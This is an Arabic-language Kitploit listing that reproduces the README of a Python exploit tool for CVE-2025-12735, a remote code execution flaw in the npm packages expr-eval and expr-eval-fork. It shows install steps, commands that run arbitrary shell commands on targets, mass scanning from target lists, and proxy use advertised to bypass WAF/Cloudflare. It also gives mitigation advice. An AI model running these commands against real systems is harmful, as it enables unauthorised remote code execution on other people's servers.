Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-12735-expr-eval-rce — أداة بحث أمني لاكتشاف واختبار CVE-2025-12735 (expr-eval RCE vulnerability) | Kitploit
أدوات/GitHubGitHub/an5i/cve-2025-12735-expr-eval-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHuban5i/cve-2025-12735-expr-eval-rce

cve-2025-12735-expr-eval-rce

أداة بحث أمني لاكتشاف واختبار CVE-2025-12735 (expr-eval RCE vulnerability)

عرض المستودع
11منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-12735 expr-eval RCE استغلال

أداة بحث أمني لكشف واختبار ثغرة CVE-2025-12735 في حزم npm expr-eval و expr-eval-fork.

⚠️ إخلاء مسؤولية

هذه الأداة مخصصة لأغراض الاختبارات الأمنية المصرح بها والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدم هذه الأداة فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.

📋 نظرة عامة

CVE-2025-12735 هي ثغرة حرجة لتنفيذ الأوامر عن بُعد (RCE) في حزم npm expr-eval و expr-eval-fork. تسمح هذه الثغرة للمهاجمين بتعريف دوال عشوائية داخل كائن context المستخدم من قبل المحلل (parser)، مما يتيح حقن كود ضار ينفذ أوامر على مستوى النظام.

درجة CVSS: 9.8 (حرجة)
الإصدارات المتأثرة: expr-eval-fork < 3.0.0
الإصدار المُصلح: expr-eval-fork v3.0.0+

🔍 الميزات

  • الكشف الآلي: يفحص استخدام مكتبة expr-eval في ملفات JavaScript
  • اكتشاف نقاط النهاية: يعثر تلقائياً على نقاط نهاية التقييم (evaluation endpoints)
  • اختبار الثغرة: يختبر وجود ثغرة CVE-2025-12735
  • تنفيذ الأوامر: يوضح إمكانية تنفيذ الأوامر عن بُعد (للاختبارات المصرح بها)
  • دعم تعدد الخيوط: مسح أهداف متعددة بالتوازي
  • دعم البروكسي: تجاوز قيود WAF/Cloudflare
  • تصدير بصيغة JSON: نتائج مفصلة بصيغة JSON

📦 التثبيت

المتطلبات الأساسية

  • Python 3.6 أو أحدث
  • pip (مدير حزم Python)

التثبيت السريع

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/AN5I/cve-2025-12735-expr-eval-rce.git
cd cve-2025-12735-expr-eval-rce

# تثبيت التبعيات
pip install -r requirements.txt

# جعل السكريبت قابلاً للتنفيذ (اختياري)
chmod +x uknf_cve_2025_12735_expr_eval_rce.py

بديل: التحميل المباشر

root@kitploit:~
# تحميل السكريبت
wget https://raw.githubusercontent.com/AN5I/cve-2025-12735-expr-eval-rce/main/uknf_cve_2025_12735_expr_eval_rce.py

# تثبيت التبعيات
pip install requests

🚀 الاستخدام

الاستخدام الأساسي

root@kitploit:~
# هدف واحد
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com

# تنفيذ أمر مخصص
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -c "whoami"

# أهداف متعددة من ملف
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

# مع تعدد الخيوط لمسح أسرع
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -t 5

# إخراج مفصل للتصحيح
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -v

استخدام البروكسيات

root@kitploit:~
# بروكسي واحد
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com --proxy http://proxy:port

# بروكسيات متعددة من ملف
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

خيارات سطر الأوامر

root@kitploit:~
-u, --url          عنوان الهدف
-f, --file         ملف يحتوي على عناوين الأهداف (واحد في كل سطر)
-c, --command      الأمر المراد تنفيذه (الافتراضي: id)
-t, --threads      عدد الخيوط (الافتراضي: 1)
-o, --output       ملف الإخراج (الافتراضي: uknf_expr_eval_results.json)
-v, --verbose      تفعيل تسجيل مفصل
--proxy            عنوان البروكسي (مثل http://127.0.0.1:8080)
--proxy-list       ملف يحتوي على عناوين بروكسيات (واحد في كل سطر)

📊 الإخراج

يقوم السكريبت بإنشاء ملف JSON بنتائج مفصلة:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:35:32.638109",
  "expr_eval_detected": true,
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/api/evaluate"
}

🔬 آلية العمل

  1. مرحلة الكشف: يفحص ملفات JavaScript ومحتوى HTML بحثاً عن مراجع expr-eval
  2. اكتشاف نقاط النهاية: يختبر نقاط نهاية API الشائعة التي قد تستخدم expr-eval
  3. اختبار الثغرة: يحاول حقن دوال عشوائية في كائن context
  4. الاستغلال: إذا كان ضعيفاً، يوضح إمكانية تنفيذ الأوامر عن بُعد

🛡️ التخفيف

إذا كنت تستخدم expr-eval أو expr-eval-fork:

  1. قم بالترقية فوراً:

    root@kitploit:~
    npm install expr-eval-fork@latest
    
  2. طبق التصحيح الأمني:

    • طبق Pull Request #288 على expr-eval
    • أو انتقل إلى expr-eval-fork v3.0.0+
  3. نفذ التحقق من الإدخال:

    • قم بتعقيم جميع مدخلات المستخدم
    • استخدم القائمة البيضاء للدوال (function whitelisting)
    • تحقق من كائنات context

📚 المراجع

  • CVE: CVE-2025-12735
  • CERT: VU#263614
  • GitHub Advisory: GHSA-jc85-fpwf-qm7x
  • التصحيح الأمني: PR #288

📖 أمثلة

مثال 1: مسح هدف واحد

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com

مثال 2: أهداف متعددة مع إخراج

root@kitploit:~
# إنشاء ملف الأهداف
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# تشغيل المسح
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

مثال 3: تنفيذ أمر مخصص

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com -c "uname -a"

مثال 4: استخدام البروكسيات

root@kitploit:~
# بروكسي واحد
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com --proxy http://127.0.0.1:8080

# بروكسيات متعددة من ملف
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

🤝 المساهمة

المساهمات مرحب بها! لا تتردد في تقديم طلب سحب (Pull Request).

  1. انسخ المستودع (Fork)
  2. أنشئ فرع الميزة الخاص بك (git checkout -b feature/AmazingFeature)
  3. قم بتثبيت تغييراتك (git commit -m 'إضافة ميزة رائعة')
  4. ادفع إلى الفرع (git push origin feature/AmazingFeature)
  5. افتح طلب سحب (Pull Request)

🐛 المشكلات

إذا واجهت أي مشكلة أو كان لديك اقتراح، يرجى فتح مشكلة (issue) على GitHub.

📝 الترخيص

هذا المشروع مرخص بموجب رخصة MIT - انظر ملف LICENSE للتفاصيل.

⭐ تاريخ النجوم

إذا وجدت هذه الأداة مفيدة، يرجى التفكير في منحها نجمة على GitHub!

⚖️ الجانب القانوني

هذه الأداة مقدمة لأغراض تعليمية واختبارات أمنية مصرح بها فقط. المؤلفون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج. المستخدمون مسؤولون عن ضمان حصولهم على التصريح المناسب قبل اختبار أي أنظمة.

🙏 الشكر والتقدير

  • مكتشف الثغرة الأصلي: Jangwoo Choe (UKO)
  • مركز تنسيق CERT للإفصاح عن الثغرات
  • GitHub Security و npm للتنبيهات الأمنية

💰 التبرعات

إذا وجدت هذه الأداة مفيدة وترغب في دعم المشروع:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

شكراً لدعمك! 🙏

تنزيل الأداة